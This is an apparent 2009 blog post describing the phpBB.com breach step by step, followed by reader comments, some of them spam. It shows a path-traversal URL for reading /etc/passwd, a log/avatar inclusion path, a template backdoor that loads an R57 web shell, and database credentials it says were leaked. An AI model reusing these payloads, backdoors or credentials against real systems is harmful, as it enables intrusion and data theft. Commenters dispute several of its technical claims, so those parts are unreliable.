How PHPBB Site was Hacked and How You Can Prevent it

By Angsuman Chakraborty, Gaea News Network
Thursday, February 5, 2009

The simplest way to start this topic is, PHPBB is hacked. You must have heard of it by now. And there is an equal chance that you haven’t. A community with almost 200.000 human members and 400,000 subscribed users have lost their privacy inside that community and there was nothing PHPBB could do but to put up a foolish status message like this just below.

But the question is, how did the hacker (say script kiddie if you like, but I don’t think 90% of the people naming him that can do half of what he did. No glorification though) do it? Here is a step by step description.

1. The Vulnerability

PHPList is generally located at the website_name/phplist address. The hacker went there and found out that the forum admins were running an old version of it. Much to his amazement and ours too, it was older than the version which had taken care of the well known milworm exploit. He used it. Isn’t it obvious?

2. Attacking /etc/passwd

Anyone who has even an one cent knowledge of PHP, knows how and what this directory look like. He tried to break through the above mentioned directory through a proxy program.

His Target Link: http://www.phpbb.com/lists/admin/index.php?_SERVER%5bConfigFile%5d=../../../../../../etc/passwd

Needless to say, he found it.

3. Reaching httpd.conf

The httpd.conf file is the main configuration file for the Apache web server. You can get directory indexing, HostnameLookups and such services at your finger tips through this. So he moved on to /etc/httpd/conf/httpd.conf.

4. Coding the Error Log

In recent times, we have seen that error log directory can be presented with rewritten or added code. So that was the best place for him to run his code and realize where exactly are the indexing happening and how can he derive the hash code for the community profiles. Like I said, he found out the hash code was f51ee61fe7a83fdf72780912bced0855 and he uploaded his avtaar there so that he could get access to the administrative privileges.

The direct path: /../../../../../../home/virtual/phpbb.com/community/images/avatars/upload/f51ee61fe7a83fdf72780912bced0855_ID.jpg

5. Second Vulernability

cat /home/virtual/phpbb.com/community/config.php That is where you can find the config details. But how on earth couldn’t the password at least be encrypted? It was just making thigs easier for him.

And here are what he found out

$dbms = 'mysqli';
$dbhost = 'phpbb.db.osuosl.org';
$dbport = '';
$dbname = 'phpbb';
$dbuser = 'phpbb2';
$dbpasswd = 'saxM9nfRjLbJ2Yy5‘;
$table_prefix = ‘community_’;

PHPlist

$database_host = "localhost";
$database_name = "phpbb_phplist";
$database_user = 'phplist';
$database_password = 'Berti3_Danc3‘;

6. Cracking Others’ Passwords

There was nothing much left. He found out some of the passwords of other admins. One funny thing is, someone had his password as phpbb! How on earth couldn’t someone bruteforce it. I wonder too.

7. The Final Blow: Getting the Full Database

The hacker got all the entries of user_id and user_password, The user’s passwords were encrypted in  unsalted md5 and their admin’s passwords in common hash. Then if you have been a forum admin of PHP enabled site, you only need to MySql update to one of the admin account’s and you are in. Or if you change their password to yours you can use the recover password function and update the list in SQL and save it to a log file. Which he did eventually. But, again, Recover password like primitive normal user mode for an admin? Oh, PHPBB, you were waiting for a punishment I guess.

8. Writing a Shell Script

This can be a mini tutorial in itself. But what he did here was practically rent a permanent room for himself inside the admin directory. How?

  • He enabled php in template files and added this bit of code to one of the templates:
    $ip=$_SERVER['REMOTE_ADDR']; if($ip == “x.x.x.x”){include(”/home/virtual/phpbb.com/community/files/(myid)_82ec9f9eb80df2a16cc3638429631c9f”);}
  • Which happened to be a shell, R57shell actually.
  • Then he searched for a writable directory and created a php file and wrote the source code to that file. And there he remained.

Word of Caution

Just my two cents of advice to all the webmasters, especially those using php applications like Joomla, phpList, WordPress etc.:

  1. Please keep your software updated always. I know it is a royal pain but that is the price you pay for getting it cheap (read free). PHP is a rapid prototyping and development language. It also means anyone, and I mean anyone, can hack up a quick application in few hours which can become popular in the course of time through contributions from the open source community. Using a popular PHP application is no guarantee of their safety as was proved time and again by Mambo / Joomla, WordPress, phpList etc. vulnerabilities.
  2. Please use any means to secure or at least obfuscate your passwords to prevent such direct attacks. WordPress, phpBB and many otherPHP based software store their password openly in files, which has been proven time and again to be a bad practice. A vulnerability with any PHP software which allows the hackers to read plain-text files, like the above exploit, can expose the passwords of all other applications in the systems which uses such inane way to store passwords. There are ways to run different applications from different users id’s which will keep them in their own silos. I will discuss more about them in a later article.

The biggest note is for php application developers. Please, please refrain from keeping clear passwords in text files. I am talking to Matt Mullenweg (just because I know his name) of WordPress, Joomla, phpBB, phpList, modX and a host of other php based application developers. I respect what you are doing but please don’t jeopardize the data security of your users.

Game over. thank you.

Discussion

monokeeloX
April 22, 2009: 12:43 am

Say saying hi to you guys!


trerrystush
April 22, 2009: 12:19 am

Where are you guys from?

April 15, 2009: 5:39 pm

He. my name Michael. I’m from NYC. I’m 35 years.
I search 3 girls for travelling to Dubai for free. ( 2009 08 01- 2008 08 20 )
If you want going to please send for me yours email ar give yours photo in this topic.

April 14, 2009: 12:28 am

Sorry may be not here… but.
Yesterday i heard from my friend about new release of Star Wars on Blu Ray…
is Somebody else heard about this release something?

Thank you.


HectellFeld
April 4, 2009: 3:48 pm

Anyone know how old this forum is? As in what year it was started?

March 24, 2009: 9:03 am

I need a driver for my phillips snn6500 wireless netcard
or smc2632 wireless net card
I can`t make them run on linpus linux lite

please help

regards
Goobrefluotte

March 10, 2009: 10:29 am

[...] in the recent past how PHPBB, one of the most important forums for programming related discussions, got hacked. Now, what’s the [...]

March 8, 2009: 5:29 pm

Excellent site blog.taragana.com and I am really pleased to see you have this this post.
I am crrently working in the south of france looking at property for sale, having fun in the sun and bookmarking everything that I find interesting on the net (including blog.taragana.com of course !)
It has taken me literally 1 hours and 55 minutes of searching the web to find you (just kidding!) so I shall be pleased to become a regular visitor from now on :)

Thanks


igor
February 17, 2009: 8:23 pm

And how exactly would you encrypt the password?


kellanved
February 17, 2009: 12:59 pm

Oh, and another factual mistake: phpList released the patch two weeks after the attacker exploiting the vulnerability. The exploit was used within hours of getting published.


Me
February 16, 2009: 6:39 pm

Next to the original hacker post, this is the dumbest blog post I’ve ever read. Why? Because you just went with whatever he said about “better security” and copied most of it as well as his other points about the hack that he pretty much followed a guide to be able to use.

Storing database passwords in plain text SOMEWHERE in the application is pretty much a requirement for ANY web application be it phpBB, WordPress, or the software running on this site or any other web app that would require database access. I doubt you have any suggestions on changing this other than repeating the hacker’s dumb suggestion of encrypting the password, in which case it STILL has to be in plain text somewhere in the app.

There was really nothing that could have been done about a 0-day exploit and, last time I checked, milworm is hardly considered a security source and more a hacking/exploiting site. What this blog should have been doing is blast the actions of the hacker. It was malicious and meant to harm a lot of people and not just the staff of phpBB and private information was not only accessed but RELEASED to the general public. It’s just like a terrorist blowing himself up in the middle of a busy marketplace with no regards for innocent bystanders.

Next time please do your due diligence in research when making your blog posts…


Kellanved
February 16, 2009: 5:31 pm

Hi,
there are a few factual mistakes in the write-up.
a) etc/passwd was empty and not used.
b) It is not possible to encrypt database passwords; even being able to do so does not increase security, as attackers can piggyback on the application’s connection. There was no second vulnerability.
c)The passwords were not in an unsalted md5; only about 7% of the accounts were legacy entries from older versions.
d)Requesting a new password has zero security implications in a scenario where the attacker could have written his new password into the database directly. This had no impact at all.
e)No other admin passwords were compromised

February 7, 2009: 10:01 pm

You could have just linked to http://hackedphpbb.blogspot.com/, where the author describes (in pretty much the _exact_ same way you do), how he did it.

February 6, 2009: 2:34 pm

Great article!

I really liked the step-by-step explanation of the hack


shumisha
February 6, 2009: 10:55 am

Hi

I am interested in this. How exactly would you not store main db access password in clear text ? if encrypted, how would you store the encryption key needed for decryption if not in clear text itself ?
What are other apps using ?
Rgds

February 6, 2009: 9:37 am

The article is a discussion on techniques with the intention to enable websites and php based web application developers to protect themselves.

It is neither intended to be a hacking guide nor to encourage any script kiddies to emulate the techniques, which is why deliberately some crucial details were left out and also the link was not provided.


yuku
February 6, 2009: 9:33 am

It seems that you get most of the information from hackedphpbb.blogspot.com/. However you didn’t provide more information, for example about how the URL “index.php?_SERVER%5bConfigFile%5d=../../../../../../etc/passwd”
will output the etc/passwd file. And why the passwd file need to be obtained?

February 6, 2009: 1:45 am

http://www.phplist.com/?lid=274

That is the exploit the hacker used. He hacked the site weeks before that update was released. We were attacked using a 0-day exploit.

How do you suggest handling configuration files that aren’t in clear text?

February 5, 2009: 9:27 pm

I wanted to know all the circumstances of the hack, thanks for sharing!

YOUR VIEW POINT
NAME : (REQUIRED)
MAIL : (REQUIRED)
will not be displayed
WEBSITE : (OPTIONAL)
YOUR
COMMENT :